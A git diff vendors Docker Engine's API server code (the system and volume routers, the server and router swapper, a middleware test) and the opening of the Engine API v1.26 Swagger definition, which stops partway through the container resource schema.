a/vendor/github.com/docker/docker/api/server/router/system/backend.go b/vendor/github.com/docker/docker/api/server/router/system/backend.go new file mode 100644 index 0000000000..6946c4e2d1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/system/backend.go @@ -0,0 +1,21 @@ +package system + +import ( + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// Backend is the methods that need to be implemented to provide +// system specific functionality. +type Backend interface { + SystemInfo() (*types.Info, error) + SystemVersion() types.Version + SystemDiskUsage() (*types.DiskUsage, error) + SubscribeToEvents(since, until time.Time, ef filters.Args) ([]events.Message, chan interface{}) + UnsubscribeFromEvents(chan interface{}) + AuthenticateToRegistry(ctx context.Context, authConfig *types.AuthConfig) (string, string, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/system/system.go b/vendor/github.com/docker/docker/api/server/router/system/system.go new file mode 100644 index 0000000000..ed23d3bdee --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/system/system.go @@ -0,0 +1,39 @@ +package system + +import ( + "github.com/docker/docker/api/server/router" + "github.com/docker/docker/daemon/cluster" +) + +// systemRouter provides information about the Docker system overall. +// It gathers information about host, daemon and container events. +type systemRouter struct { + backend Backend + clusterProvider *cluster.Cluster + routes []router.Route +} + +// NewRouter initializes a new system router +func NewRouter(b Backend, c *cluster.Cluster) router.Router { + r := &systemRouter{ + backend: b, + clusterProvider: c, + } + + r.routes = []router.Route{ + router.NewOptionsRoute("/{anyroute:.*}", optionsHandler), + router.NewGetRoute("/_ping", pingHandler), + router.Cancellable(router.NewGetRoute("/events", r.getEvents)), + router.NewGetRoute("/info", r.getInfo), + router.NewGetRoute("/version", r.getVersion), + router.NewGetRoute("/system/df", r.getDiskUsage), + router.NewPostRoute("/auth", r.postAuth), + } + + return r +} + +// Routes returns all the API routes dedicated to the docker system +func (s *systemRouter) Routes() []router.Route { + return s.routes +} diff --git a/vendor/github.com/docker/docker/api/server/router/system/system_routes.go b/vendor/github.com/docker/docker/api/server/router/system/system_routes.go new file mode 100644 index 0000000000..0d851b684a --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/system/system_routes.go @@ -0,0 +1,186 @@ +package system + +import ( + "encoding/json" + "fmt" + "net/http" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/registry" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/ioutils" + "golang.org/x/net/context" +) + +func optionsHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + w.WriteHeader(http.StatusOK) + return nil +} + +func pingHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + _, err := w.Write([]byte{'O', 'K'}) + return err +} + +func (s *systemRouter) getInfo(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + info, err := s.backend.SystemInfo() + if err != nil { + return err + } + if s.clusterProvider != nil { + info.Swarm = s.clusterProvider.Info() + } + + if versions.LessThan(httputils.VersionFromContext(ctx), "1.25") { + // TODO: handle this conversion in engine-api + type oldInfo struct { + *types.Info + ExecutionDriver string + } + old := &oldInfo{ + Info: info, + ExecutionDriver: "", + } + nameOnlySecurityOptions := []string{} + kvSecOpts, err := types.DecodeSecurityOptions(old.SecurityOptions) + if err != nil { + return err + } + for _, s := range kvSecOpts { + nameOnlySecurityOptions = append(nameOnlySecurityOptions, s.Name) + } + old.SecurityOptions = nameOnlySecurityOptions + return httputils.WriteJSON(w, http.StatusOK, old) + } + return httputils.WriteJSON(w, http.StatusOK, info) +} + +func (s *systemRouter) getVersion(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + info := s.backend.SystemVersion() + info.APIVersion = api.DefaultVersion + + return httputils.WriteJSON(w, http.StatusOK, info) +} + +func (s *systemRouter) getDiskUsage(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + du, err := s.backend.SystemDiskUsage() + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, du) +} + +func (s *systemRouter) getEvents(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + since, err := eventTime(r.Form.Get("since")) + if err != nil { + return err + } + until, err := eventTime(r.Form.Get("until")) + if err != nil { + return err + } + + var ( + timeout <-chan time.Time + onlyPastEvents bool + ) + if !until.IsZero() { + if until.Before(since) { + return errors.NewBadRequestError(fmt.Errorf("`since` time (%s) cannot be after `until` time (%s)", r.Form.Get("since"), r.Form.Get("until"))) + } + + now := time.Now() + + onlyPastEvents = until.Before(now) + + if !onlyPastEvents { + dur := until.Sub(now) + timeout = time.NewTimer(dur).C + } + } + + ef, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + w.Header().Set("Content-Type", "application/json") + output := ioutils.NewWriteFlusher(w) + defer output.Close() + output.Flush() + + enc := json.NewEncoder(output) + + buffered, l := s.backend.SubscribeToEvents(since, until, ef) + defer s.backend.UnsubscribeFromEvents(l) + + for _, ev := range buffered { + if err := enc.Encode(ev); err != nil { + return err + } + } + + if onlyPastEvents { + return nil + } + + for { + select { + case ev := <-l: + jev, ok := ev.(events.Message) + if !ok { + logrus.Warnf("unexpected event message: %q", ev) + continue + } + if err := enc.Encode(jev); err != nil { + return err + } + case <-timeout: + return nil + case <-ctx.Done(): + logrus.Debug("Client context cancelled, stop sending events") + return nil + } + } +} + +func (s *systemRouter) postAuth(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var config *types.AuthConfig + err := json.NewDecoder(r.Body).Decode(&config) + r.Body.Close() + if err != nil { + return err + } + status, token, err := s.backend.AuthenticateToRegistry(ctx, config) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, ®istry.AuthenticateOKBody{ + Status: status, + IdentityToken: token, + }) +} + +func eventTime(formTime string) (time.Time, error) { + t, tNano, err := timetypes.ParseTimestamps(formTime, -1) + if err != nil { + return time.Time{}, err + } + if t == -1 { + return time.Time{}, nil + } + return time.Unix(t, tNano), nil +} diff --git a/vendor/github.com/docker/docker/api/server/router/volume/backend.go b/vendor/github.com/docker/docker/api/server/router/volume/backend.go new file mode 100644 index 0000000000..180c06e5d3 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/volume/backend.go @@ -0,0 +1,17 @@ +package volume + +import ( + // TODO return types need to be refactored into pkg + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" +) + +// Backend is the methods that need to be implemented to provide +// volume specific functionality +type Backend interface { + Volumes(filter string) ([]*types.Volume, []string, error) + VolumeInspect(name string) (*types.Volume, error) + VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) + VolumeRm(name string, force bool) error + VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/volume/volume.go b/vendor/github.com/docker/docker/api/server/router/volume/volume.go new file mode 100644 index 0000000000..4e9f972a69 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/volume/volume.go @@ -0,0 +1,36 @@ +package volume + +import "github.com/docker/docker/api/server/router" + +// volumeRouter is a router to talk with the volumes controller +type volumeRouter struct { + backend Backend + routes []router.Route +} + +// NewRouter initializes a new volume router +func NewRouter(b Backend) router.Router { + r := &volumeRouter{ + backend: b, + } + r.initRoutes() + return r +} + +// Routes returns the available routes to the volumes controller +func (r *volumeRouter) Routes() []router.Route { + return r.routes +} + +func (r *volumeRouter) initRoutes() { + r.routes = []router.Route{ + // GET + router.NewGetRoute("/volumes", r.getVolumesList), + router.NewGetRoute("/volumes/{name:.*}", r.getVolumeByName), + // POST + router.NewPostRoute("/volumes/create", r.postVolumesCreate), + router.NewPostRoute("/volumes/prune", r.postVolumesPrune), + // DELETE + router.NewDeleteRoute("/volumes/{name:.*}", r.deleteVolumes), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go b/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go new file mode 100644 index 0000000000..cfd4618a4d --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go @@ -0,0 +1,80 @@ +package volume + +import ( + "encoding/json" + "net/http" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +func (v *volumeRouter) getVolumesList(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + volumes, warnings, err := v.backend.Volumes(r.Form.Get("filters")) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, &volumetypes.VolumesListOKBody{Volumes: volumes, Warnings: warnings}) +} + +func (v *volumeRouter) getVolumeByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + volume, err := v.backend.VolumeInspect(vars["name"]) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, volume) +} + +func (v *volumeRouter) postVolumesCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + var req volumetypes.VolumesCreateBody + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + return err + } + + volume, err := v.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusCreated, volume) +} + +func (v *volumeRouter) deleteVolumes(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + force := httputils.BoolValue(r, "force") + if err := v.backend.VolumeRm(vars["name"], force); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (v *volumeRouter) postVolumesPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + pruneReport, err := v.backend.VolumesPrune(filters.Args{}) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, pruneReport) +} diff --git a/vendor/github.com/docker/docker/api/server/router_swapper.go b/vendor/github.com/docker/docker/api/server/router_swapper.go new file mode 100644 index 0000000000..1ecc7a7f39 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router_swapper.go @@ -0,0 +1,30 @@ +package server + +import ( + "net/http" + "sync" + + "github.com/gorilla/mux" +) + +// routerSwapper is an http.Handler that allows you to swap +// mux routers. +type routerSwapper struct { + mu sync.Mutex + router *mux.Router +} + +// Swap changes the old router with the new one. +func (rs *routerSwapper) Swap(newRouter *mux.Router) { + rs.mu.Lock() + rs.router = newRouter + rs.mu.Unlock() +} + +// ServeHTTP makes the routerSwapper to implement the http.Handler interface. +func (rs *routerSwapper) ServeHTTP(w http.ResponseWriter, r *http.Request) { + rs.mu.Lock() + router := rs.router + rs.mu.Unlock() + router.ServeHTTP(w, r) +} diff --git a/vendor/github.com/docker/docker/api/server/server.go b/vendor/github.com/docker/docker/api/server/server.go new file mode 100644 index 0000000000..60ee075c79 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/server.go @@ -0,0 +1,210 @@ +package server + +import ( + "crypto/tls" + "fmt" + "net" + "net/http" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/middleware" + "github.com/docker/docker/api/server/router" + "github.com/gorilla/mux" + "golang.org/x/net/context" +) + +// versionMatcher defines a variable matcher to be parsed by the router +// when a request is about to be served. +const versionMatcher = "/v{version:[0-9.]+}" + +// Config provides the configuration for the API server +type Config struct { + Logging bool + EnableCors bool + CorsHeaders string + Version string + SocketGroup string + TLSConfig *tls.Config +} + +// Server contains instance details for the server +type Server struct { + cfg *Config + servers []*HTTPServer + routers []router.Router + routerSwapper *routerSwapper + middlewares []middleware.Middleware +} + +// New returns a new instance of the server based on the specified configuration. +// It allocates resources which will be needed for ServeAPI(ports, unix-sockets). +func New(cfg *Config) *Server { + return &Server{ + cfg: cfg, + } +} + +// UseMiddleware appends a new middleware to the request chain. +// This needs to be called before the API routes are configured. +func (s *Server) UseMiddleware(m middleware.Middleware) { + s.middlewares = append(s.middlewares, m) +} + +// Accept sets a listener the server accepts connections into. +func (s *Server) Accept(addr string, listeners ...net.Listener) { + for _, listener := range listeners { + httpServer := &HTTPServer{ + srv: &http.Server{ + Addr: addr, + }, + l: listener, + } + s.servers = append(s.servers, httpServer) + } +} + +// Close closes servers and thus stop receiving requests +func (s *Server) Close() { + for _, srv := range s.servers { + if err := srv.Close(); err != nil { + logrus.Error(err) + } + } +} + +// serveAPI loops through all initialized servers and spawns goroutine +// with Serve method for each. It sets createMux() as Handler also. +func (s *Server) serveAPI() error { + var chErrors = make(chan error, len(s.servers)) + for _, srv := range s.servers { + srv.srv.Handler = s.routerSwapper + go func(srv *HTTPServer) { + var err error + logrus.Infof("API listen on %s", srv.l.Addr()) + if err = srv.Serve(); err != nil && strings.Contains(err.Error(), "use of closed network connection") { + err = nil + } + chErrors <- err + }(srv) + } + + for i := 0; i < len(s.servers); i++ { + err := <-chErrors + if err != nil { + return err + } + } + + return nil +} + +// HTTPServer contains an instance of http server and the listener. +// srv *http.Server, contains configuration to create an http server and a mux router with all api end points. +// l net.Listener, is a TCP or Socket listener that dispatches incoming request to the router. +type HTTPServer struct { + srv *http.Server + l net.Listener +} + +// Serve starts listening for inbound requests. +func (s *HTTPServer) Serve() error { + return s.srv.Serve(s.l) +} + +// Close closes the HTTPServer from listening for the inbound requests. +func (s *HTTPServer) Close() error { + return s.l.Close() +} + +func (s *Server) makeHTTPHandler(handler httputils.APIFunc) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + // Define the context that we'll pass around to share info + // like the docker-request-id. + // + // The 'context' will be used for global data that should + // apply to all requests. Data that is specific to the + // immediate function being called should still be passed + // as 'args' on the function call. + ctx := context.WithValue(context.Background(), httputils.UAStringKey, r.Header.Get("User-Agent")) + handlerFunc := s.handlerWithGlobalMiddlewares(handler) + + vars := mux.Vars(r) + if vars == nil { + vars = make(map[string]string) + } + + if err := handlerFunc(ctx, w, r, vars); err != nil { + statusCode := httputils.GetHTTPErrorStatusCode(err) + errFormat := "%v" + if statusCode == http.StatusInternalServerError { + errFormat = "%+v" + } + logrus.Errorf("Handler for %s %s returned error: "+errFormat, r.Method, r.URL.Path, err) + httputils.MakeErrorHandler(err)(w, r) + } + } +} + +// InitRouter initializes the list of routers for the server. +// This method also enables the Go profiler if enableProfiler is true. +func (s *Server) InitRouter(enableProfiler bool, routers ...router.Router) { + s.routers = append(s.routers, routers...) + + m := s.createMux() + if enableProfiler { + profilerSetup(m) + } + s.routerSwapper = &routerSwapper{ + router: m, + } +} + +// createMux initializes the main router the server uses. +func (s *Server) createMux() *mux.Router { + m := mux.NewRouter() + + logrus.Debug("Registering routers") + for _, apiRouter := range s.routers { + for _, r := range apiRouter.Routes() { + f := s.makeHTTPHandler(r.Handler()) + + logrus.Debugf("Registering %s, %s", r.Method(), r.Path()) + m.Path(versionMatcher + r.Path()).Methods(r.Method()).Handler(f) + m.Path(r.Path()).Methods(r.Method()).Handler(f) + } + } + + err := errors.NewRequestNotFoundError(fmt.Errorf("page not found")) + notFoundHandler := httputils.MakeErrorHandler(err) + m.HandleFunc(versionMatcher+"/{path:.*}", notFoundHandler) + m.NotFoundHandler = notFoundHandler + + return m +} + +// Wait blocks the server goroutine until it exits. +// It sends an error message if there is any error during +// the API execution. +func (s *Server) Wait(waitChan chan error) { + if err := s.serveAPI(); err != nil { + logrus.Errorf("ServeAPI error: %v", err) + waitChan <- err + return + } + waitChan <- nil +} + +// DisableProfiler reloads the server mux without adding the profiler routes. +func (s *Server) DisableProfiler() { + s.routerSwapper.Swap(s.createMux()) +} + +// EnableProfiler reloads the server mux adding the profiler routes. +func (s *Server) EnableProfiler() { + m := s.createMux() + profilerSetup(m) + s.routerSwapper.Swap(m) +} diff --git a/vendor/github.com/docker/docker/api/server/server_test.go b/vendor/github.com/docker/docker/api/server/server_test.go new file mode 100644 index 0000000000..11831c148d --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/server_test.go @@ -0,0 +1,46 @@ +package server + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" + + "github.com/docker/docker/api" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/middleware" + + "golang.org/x/net/context" +) + +func TestMiddlewares(t *testing.T) { + cfg := &Config{ + Version: "0.1omega2", + } + srv := &Server{ + cfg: cfg, + } + + srv.UseMiddleware(middleware.NewVersionMiddleware("0.1omega2", api.DefaultVersion, api.MinVersion)) + + req, _ := http.NewRequest("GET", "/containers/json", nil) + resp := httptest.NewRecorder() + ctx := context.Background() + + localHandler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if httputils.VersionFromContext(ctx) == "" { + t.Fatalf("Expected version, got empty string") + } + + if sv := w.Header().Get("Server"); !strings.Contains(sv, "Docker/0.1omega2") { + t.Fatalf("Expected server version in the header `Docker/0.1omega2`, got %s", sv) + } + + return nil + } + + handlerFunc := srv.handlerWithGlobalMiddlewares(localHandler) + if err := handlerFunc(ctx, resp, req, map[string]string{}); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/api/swagger-gen.yaml b/vendor/github.com/docker/docker/api/swagger-gen.yaml new file mode 100644 index 0000000000..f07a02737f --- /dev/null +++ b/vendor/github.com/docker/docker/api/swagger-gen.yaml @@ -0,0 +1,12 @@ + +layout: + models: + - name: definition + source: asset:model + target: "{{ joinFilePath .Target .ModelPackage }}" + file_name: "{{ (snakize (pascalize .Name)) }}.go" + operations: + - name: handler + source: asset:serverOperation + target: "{{ joinFilePath .Target .APIPackage .Package }}" + file_name: "{{ (snakize (pascalize .Name)) }}.go" diff --git a/vendor/github.com/docker/docker/api/swagger.yaml b/vendor/github.com/docker/docker/api/swagger.yaml new file mode 100644 index 0000000000..d19e8c9ca8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/swagger.yaml @@ -0,0 +1,7785 @@ +# A Swagger 2.0 (a.k.a. OpenAPI) definition of the Engine API. +# +# This is used for generating API documentation and the types used by the +# client/server. See api/README.md for more information. +# +# Some style notes: +# - This file is used by ReDoc, which allows GitHub Flavored Markdown in +# descriptions. +# - There is no maximum line length, for ease of editing and pretty diffs. +# - operationIds are in the format "NounVerb", with a singular noun. + +swagger: "2.0" +schemes: + - "http" + - "https" +produces: + - "application/json" + - "text/plain" +consumes: + - "application/json" + - "text/plain" +basePath: "/v1.26" +info: + title: "Docker Engine API" + version: "1.26" + x-logo: + url: "https://docs.docker.com/images/logo-docker-main.png" + description: | + The Engine API is an HTTP API served by Docker Engine. It is the API the Docker client uses to communicate with the Engine, so everything the Docker client can do can be done with the API. + + Most of the client's commands map directly to API endpoints (e.g. `docker ps` is `GET /containers/json`). The notable exception is running containers, which consists of several API calls. + + # Errors + + The API uses standard HTTP status codes to indicate the success or failure of the API call. The body of the response will be JSON in the following format: + + ``` + { + "message": "page not found" + } + ``` + + # Versioning + + The API is usually changed in each release of Docker, so API calls are versioned to ensure that clients don't break. + + For Docker Engine >= 1.13.1, the API version is 1.26. To lock to this version, you prefix the URL with `/v1.26`. For example, calling `/info` is the same as calling `/v1.26/info`. + + Engine releases in the near future should support this version of the API, so your client will continue to work even if it is talking to a newer Engine. + + In previous versions of Docker, it was possible to access the API without providing a version. This behaviour is now deprecated will be removed in a future version of Docker. + + The API uses an open schema model, which means server may add extra properties to responses. Likewise, the server will ignore any extra query parameters and request body properties. When you write clients, you need to ignore additional properties in responses to ensure they do not break when talking to newer Docker daemons. + + This documentation is for version 1.26 of the API, which was introduced with Docker 1.13.1. Use this table to find documentation for previous versions of the API: + + Docker version | API version | Changes + ----------------|-------------|--------- + 1.13.0 | [1.25](https://docs.docker.com/engine/api/v1.25/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-25-api-changes) + 1.12.x | [1.24](https://docs.docker.com/engine/api/v1.24/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-24-api-changes) + 1.11.x | [1.23](https://docs.docker.com/engine/api/v1.23/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-23-api-changes) + 1.10.x | [1.22](https://docs.docker.com/engine/api/v1.22/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-22-api-changes) + 1.9.x | [1.21](https://docs.docker.com/engine/api/v1.21/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-21-api-changes) + 1.8.x | [1.20](https://docs.docker.com/engine/api/v1.20/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-20-api-changes) + 1.7.x | [1.19](https://docs.docker.com/engine/api/v1.19/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-19-api-changes) + 1.6.x | [1.18](https://docs.docker.com/engine/api/v1.18/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-18-api-changes) + + # Authentication + + Authentication for registries is handled client side. The client has to send authentication details to various endpoints that need to communicate with registries, such as `POST /images/(name)/push`. These are sent as `X-Registry-Auth` header as a Base64 encoded (JSON) string with the following structure: + + ``` + { + "username": "string", + "password": "string", + "email": "string", + "serveraddress": "string" + } + ``` + + The `serveraddress` is a domain/IP without a protocol. Throughout this structure, double quotes are required. + + If you have already got an identity token from the [`/auth` endpoint](#operation/SystemAuth), you can just pass this instead of credentials: + + ``` + { + "identitytoken": "9cbaf023786cd7..." + } + ``` + +# The tags on paths define the menu sections in the ReDoc documentation, so +# the usage of tags must make sense for that: +# - They should be singular, not plural. +# - There should not be too many tags, or the menu becomes unwieldly. For +# example, it is preferable to add a path to the "System" tag instead of +# creating a tag with a single path in it. +# - The order of tags in this list defines the order in the menu. +tags: + # Primary objects + - name: "Container" + x-displayName: "Containers" + description: | + Create and manage containers. + - name: "Image" + x-displayName: "Images" + - name: "Network" + x-displayName: "Networks" + description: | + Networks are user-defined networks that containers can be attached to. See the [networking documentation](https://docs.docker.com/engine/userguide/networking/) for more information. + - name: "Volume" + x-displayName: "Volumes" + description: | + Create and manage persistent storage that can be attached to containers. + - name: "Exec" + x-displayName: "Exec" + description: | + Run new commands inside running containers. See the [command-line reference](https://docs.docker.com/engine/reference/commandline/exec/) for more information. + + To exec a command in a container, you first need to create an exec instance, then start it. These two API endpoints are wrapped up in a single command-line command, `docker exec`. + - name: "Secret" + x-displayName: "Secrets" + # Swarm things + - name: "Swarm" + x-displayName: "Swarm" + description: | + Engines can be clustered together in a swarm. See [the swarm mode documentation](https://docs.docker.com/engine/swarm/) for more information. + - name: "Node" + x-displayName: "Nodes" + description: | + Nodes are instances of the Engine participating in a swarm. Swarm mode must be enabled for these endpoints to work. + - name: "Service" + x-displayName: "Services" + description: | + Services are the definitions of tasks to run on a swarm. Swarm mode must be enabled for these endpoints to work. + - name: "Task" + x-displayName: "Tasks" + description: | + A task is a container running on a swarm. It is the atomic scheduling unit of swarm. Swarm mode must be enabled for these endpoints to work. + # System things + - name: "Plugin" + x-displayName: "Plugins" + - name: "System" + x-displayName: "System" + +definitions: + Port: + type: "object" + description: "An open port on a container" + required: [PrivatePort, Type] + properties: + IP: + type: "string" + format: "ip-address" + PrivatePort: + type: "integer" + format: "uint16" + x-nullable: false + description: "Port on the container" + PublicPort: + type: "integer" + format: "uint16" + description: "Port exposed on the host" + Type: + type: "string" + x-nullable: false + enum: ["tcp", "udp"] + example: + PrivatePort: 8080 + PublicPort: 80 + Type: "tcp" + + MountPoint: + type: "object" + description: "A mount point inside a container" + properties: + Type: + type: "string" + Name: + type: "string" + Source: + type: "string" + Destination: + type: "string" + Driver: + type: "string" + Mode: + type: "string" + RW: + type: "boolean" + Propagation: + type: "string" + + DeviceMapping: + type: "object" + description: "A device mapping between the host and container" + properties: + PathOnHost: + type: "string" + PathInContainer: + type: "string" + CgroupPermissions: + type: "string" + example: + PathOnHost: "/dev/deviceName" + PathInContainer: "/dev/deviceName" + CgroupPermissions: "mrw" + + ThrottleDevice: + type: "object" + properties: + Path: + description: "Device path" + type: "string" + Rate: + description: "Rate" + type: "integer" + format: "int64" + minimum: 0 + + Mount: + type: "object" + properties: + Target: + description: "Container path." + type: "string" + Source: + description: "Mount source (e.g. a volume name, a host path)." + Type: + description: | + The mount type. Available types: + + - `bind` Mounts a file or directory from the host into the container. Must exist prior to creating the container. + - `volume` Creates a volume with the given name and options (or uses a pre-existing volume with the same name and options). These are **not** removed when the container is removed. + - `tmpfs` Create a tmpfs with the given options. The mount source cannot be specified for tmpfs. + type: "string" + enum: + - "bind" + - "volume" + - "tmpfs" + ReadOnly: + description: "Whether the mount should be read-only." + type: "boolean" + BindOptions: + description: "Optional configuration for the `bind` type." + type: "object" + properties: + Propagation: + description: "A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`." + enum: + - "private" + - "rprivate" + - "shared" + - "rshared" + - "slave" + - "rslave" + VolumeOptions: + description: "Optional configuration for the `volume` type." + type: "object" + properties: + NoCopy: + description: "Populate volume with data from the target." + type: "boolean" + default: false + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + DriverConfig: + description: "Map of driver specific options" + type: "object" + properties: + Name: + description: "Name of the driver to use to create the volume." + type: "string" + Options: + description: "key/value map of driver specific options." + type: "object" + additionalProperties: + type: "string" + TmpfsOptions: + description: "Optional configuration for the `tmpfs` type." + type: "object" + properties: + SizeBytes: + description: "The size for the tmpfs mount in bytes." + type: "integer" + format: "int64" + Mode: + description: "The permission mode for the tmpfs mount in an integer." + type: "integer" + RestartPolicy: + description: | + The behavior to apply when the container exits. The default is not to restart. + + An ever increasing delay (double the previous delay, starting at 100ms) is added before each restart to prevent flooding the server. + type: "object" + properties: + Name: + type: "string" + description: | + - `always` Always restart + - `unless-stopped` Restart always except when the user has manually stopped the container + - `on-failure` Restart only when the container exit code is non-zero + enum: + - "always" + - "unless-stopped" + - "on-failure" + MaximumRetryCount: + type: "integer" + description: "If `on-failure` is used, the number of times to retry before giving up" + default: {} + + Resources: + description: "A container's resources (cgroups config, ulimits, etc)" + type: "object" + properties: + # Applicable to all platforms + CpuShares: + description: "An integer value representing this container's relative CPU weight versus other containers." + type: "integer" + Memory: + description: "Memory limit in bytes." + type: "integer" + default: 0 + # Applicable to UNIX platforms + CgroupParent: + description: "Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist." + type: "string" + BlkioWeight: + description: "Block IO weight (relative weight)." + type: "integer" + minimum: 0 + maximum: 1000 + BlkioWeightDevice: + description: | + Block IO weight (relative device weight) in the form `[{"Path": "device_path", "Weight": weight}]`. + type: "array" + items: + type: "object" + properties: + Path: + type: "string" + Weight: + type: "integer" + minimum: 0 + BlkioDeviceReadBps: + description: | + Limit read rate (bytes per second) from a device, in the form `[{"Path": "device_path", "Rate": rate}]`. + type: "array" + items: + $ref: "#/definitions/ThrottleDevice" + BlkioDeviceWriteBps: + description: | + Limit write rate (bytes per second) to a device, in the form `[{"Path": "device_path", "Rate": rate}]`. + type: "array" + items: + $ref: "#/definitions/ThrottleDevice" + BlkioDeviceReadIOps: + description: | + Limit read rate (IO per second) from a device, in the form `[{"Path": "device_path", "Rate": rate}]`. + type: "array" + items: + $ref: "#/definitions/ThrottleDevice" + BlkioDeviceWriteIOps: + description: | + Limit write rate (IO per second) to a device, in the form `[{"Path": "device_path", "Rate": rate}]`. + type: "array" + items: + $ref: "#/definitions/ThrottleDevice" + CpuPeriod: + description: "The length of a CPU period in microseconds." + type: "integer" + format: "int64" + CpuQuota: + description: "Microseconds of CPU time that the container can get in a CPU period." + type: "integer" + format: "int64" + CpuRealtimePeriod: + description: "The length of a CPU real-time period in microseconds. Set to 0 to allocate no time allocated to real-time tasks." + type: "integer" + format: "int64" + CpuRealtimeRuntime: + description: "The length of a CPU real-time runtime in microseconds. Set to 0 to allocate no time allocated to real-time tasks." + type: "integer" + format: "int64" + CpusetCpus: + description: "CPUs in which to allow execution (e.g., `0-3`, `0,1`)" + type: "string" + CpusetMems: + description: "Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems." + type: "string" + Devices: + description: "A list of devices to add to the container." + type: "array" + items: + $ref: "#/definitions/DeviceMapping" + DiskQuota: + description: "Disk limit (in bytes)." + type: "integer" + format: "int64" + KernelMemory: + description: "Kernel memory limit in bytes." + type: "integer" + format: "int64" + MemoryReservation: + description: "Memory soft limit in bytes." + type: "integer" + format: "int64" + MemorySwap: + description: "Total memory limit (memory + swap). Set as `-1` to enable unlimited swap." + type: "integer" + format: "int64" + MemorySwappiness: + description: "Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100." + type: "integer" + format: "int64" + minimum: 0 + maximum: 100 + NanoCPUs: + description: "CPU quota in units of 10-9 CPUs." + type: "integer" + format: "int64" + OomKillDisable: + description: "Disable OOM Killer for the container." + type: "boolean" + PidsLimit: + description: "Tune a container's pids limit. Set -1 for unlimited." + type: "integer" + format: "int64" + Ulimits: + description: | + A list of resource limits to set in the container. For example: `{"Name": "nofile", "Soft": 1024, "Hard": 2048}`" + type: "array" + items: + type: "object" + properties: + Name: + description: "Name of ulimit" + type: "string" + Soft: + description: "Soft limit" + type: "integer" + Hard: + description: "Hard limit" + type: "integer" + # Applicable to Windows + 